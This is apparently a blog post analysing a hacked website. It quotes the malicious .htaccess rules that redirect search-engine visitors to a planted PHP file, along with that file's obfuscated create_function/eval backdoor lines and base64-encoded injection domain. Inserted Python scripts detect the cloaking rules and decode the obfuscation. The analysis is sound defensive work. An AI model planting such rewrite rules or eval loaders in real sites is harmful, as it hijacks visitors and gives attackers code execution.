.htaccess compromised

[Screenshot, 2016-08-09]

A simple, clean, flat HTML site was recently hacked to target its search-engine traffic. Arriving at the site by typing the domain, or via some secondary link, served the site without issue. Arriving via a search engine, or with a search-engine user agent, well, that's a paddlin'.


Here's the .htaccess file:

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]
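The pattern above, a RewriteCond on the visitor's user agent or referer that feeds a RewriteRule into a PHP file, is the fingerprint of this kind of cloaking. The script below is an added example of mine, not from the post: it walks an .htaccess file, pairs each RewriteRule with the RewriteCond block that precedes it, and flags any rule whose conditions key on search-engine names. The two sample files are constructed (the first reproduces the rules quoted above; the second is an ordinary front-controller rule set), and the list of search-engine names is my own, not the post's.

```python
import re

# Constructed sample: the rules quoted in the post (the "-" target written plainly).
CLOAKED_HTACCESS = """RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]
"""

# Constructed sample of an ordinary front-controller rule set, for comparison.
BENIGN_HTACCESS = """RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

# Names a cloaking condition typically matches against (assumption: my own list,
# extend it with whatever crawlers matter for your site).
SEARCH_ENGINE_NAMES = ("google", "yahoo", "msn", "aol", "bing", "yandex", "baidu", "duckduckgo")
# Server variables that describe the visitor rather than the requested resource.
VISITOR_VARS = ("HTTP_USER_AGENT", "HTTP_REFERER")


def is_cloaking_condition(test_string, cond_pattern):
    """True if a RewriteCond inspects who the visitor is (UA or referer)
    and its pattern names a search engine."""
    if not any(v in test_string.upper() for v in VISITOR_VARS):
        return False
    return any(name in cond_pattern.lower() for name in SEARCH_ENGINE_NAMES)


def find_cloaking_rules(htaccess_text):
    """Scan .htaccess text and return one finding per RewriteRule whose
    preceding RewriteCond block keys on search-engine visitors.

    Each finding: {"rule_line": n, "target": "...", "cond_lines": [...]}.
    """
    findings = []
    pending = []  # (line, test string, pattern) of RewriteConds since the last RewriteRule
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append((lineno, parts[1], parts[2]))
        elif directive == "rewriterule" and len(parts) >= 3:
            # In mod_rewrite, RewriteCond lines apply only to the next RewriteRule,
            # so the pending block is consumed here whether or not it is suspicious.
            hits = [n for n, var, pat in pending if is_cloaking_condition(var, pat)]
            if hits:
                findings.append({"rule_line": lineno, "target": parts[2], "cond_lines": hits})
            pending = []
    return findings


if __name__ == "__main__":
    for label, text in (("cloaked", CLOAKED_HTACCESS), ("benign", BENIGN_HTACCESS)):
        print(label, find_cloaking_rules(text))
```

Run it against every .htaccess under the document root (the compromise is often planted in a subdirectory, not just the top level); a hit on a rule whose target is a PHP file you did not put there is worth a look even if the file name sounds "important".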

ooooh…details-enforcers.php. Sounds important! Let’s take a look:

[Screenshot of details-enforcers.php, 2016-08-09]

Hello Mr. Fancy Pants. Let’s see what you are trying to hide:

That first variable,

$meymun="\x63".chr(114)."\x65"."a".chr(116).chr(101)."_".chr(102)."u"."n"."\x63".chr(116).chr(105).chr(111).chr(110);

is fancy-speak for create_function: each chr() call and \x escape is just one letter of the name.

$qweboi = $meymun('$a',strrev(';)a$(lave'));

becomes an anonymous function, lambda_1. Then on the next line we see a strrev(), because nothing is as secure as reversing a string. So let's reverse it: the function body is eval($a). Hey, it's an eval(base64_decode())! **sarcasm**

The decoded payload is a PHP script I have put HERE. What's funny is that they base64_encode()d a domain name in the script:

$domain=base64_decode("bWFnMWN3MHJsZC5jb20=");

That is the host that sends the injected content. And the domain?

mag1cw0rld.com
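Every layer above (the chr()/\x spelling of create_function, the strrev()'d eval, the base64'd domain) is constant folding that can be undone without ever running the script. The following is an added example of mine, not code from the post or from the malware: a small Python deobfuscator that rewrites chr(N), strrev(<literal>) and base64_decode(<literal>) into plain literals until nothing changes, then lists the decoded string literals of the line in source order. The three sample lines are the ones quoted above with the smart quotes normalised back to ASCII; the function and variable names are my own.

```python
import base64
import binascii
import re

# Constructed sample input: the three obfuscated lines quoted in the post,
# with the smart quotes normalised back to plain ASCII quotes.
SAMPLE_LINES = [
    '$meymun="\\x63".chr(114)."\\x65"."a".chr(116).chr(101)."_".chr(102).'
    '"u"."n"."\\x63".chr(116).chr(105).chr(111).chr(110);',
    "$qweboi = $meymun('$a',strrev(';)a$(lave'));",
    '$domain=base64_decode("bWFnMWN3MHJsZC5jb20=");',
]

# A PHP string literal: double-quoted (only \xNN escapes are handled) or single-quoted.
QUOTED = r'''(?:"((?:\\x[0-9a-fA-F]{2}|[^"\\])*)"|'([^']*)')'''
LITERAL = re.compile(QUOTED)
CHR_CALL = re.compile(r'chr\((\d+)\)')
STRREV_CALL = re.compile(r'strrev\(' + QUOTED + r'\)')
B64_CALL = re.compile(r'base64_decode\(' + QUOTED + r'\)')


def _unquote(m):
    """Decode the literal captured by QUOTED (group 1 = double-, group 2 = single-quoted)."""
    if m.group(1) is not None:
        return re.sub(r'\\x([0-9a-fA-F]{2})',
                      lambda h: chr(int(h.group(1), 16)), m.group(1))
    return m.group(2)


def _hex_literal(s):
    """Re-emit a decoded value as a double-quoted literal made only of \\xNN escapes,
    so quotes inside the value cannot confuse the next pass."""
    return '"' + ''.join('\\x%02x' % (ord(c) & 0xff) for c in s) + '"'


def _b64(m):
    """Fold base64_decode(<literal>); leave the call alone if the text is not valid base64."""
    try:
        return _hex_literal(base64.b64decode(_unquote(m)).decode("latin-1"))
    except (binascii.Error, ValueError):
        return m.group(0)


def simplify_once(expr):
    """One rewriting pass: chr(N), strrev(<literal>) and base64_decode(<literal>)
    are each replaced by the literal they evaluate to. Nothing is executed."""
    expr = CHR_CALL.sub(lambda m: _hex_literal(chr(int(m.group(1)) % 256)), expr)
    expr = STRREV_CALL.sub(lambda m: _hex_literal(_unquote(m)[::-1]), expr)
    expr = B64_CALL.sub(_b64, expr)
    return expr


def php_literals(line, max_passes=10):
    """Fold the obfuscation calls to a fixpoint, then return the decoded string
    literals of the line in source order."""
    for _ in range(max_passes):
        folded = simplify_once(line)
        if folded == line:
            break
        line = folded
    return [_unquote(m) for m in LITERAL.finditer(line)]


def php_concat(line):
    """Join the literals of a pure '.'-concatenation line into one string."""
    return ''.join(php_literals(line))


if __name__ == "__main__":
    for src in SAMPLE_LINES:
        print(src)
        print("   ->", php_literals(src))
```

The point of folding rather than running the sample in a PHP sandbox is that the result is a list of strings, so a create_function or eval that surfaces is a finding to record, not code that just got executed on your analysis box.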

You know they are good because they use 1s for i's and zeros for o's.
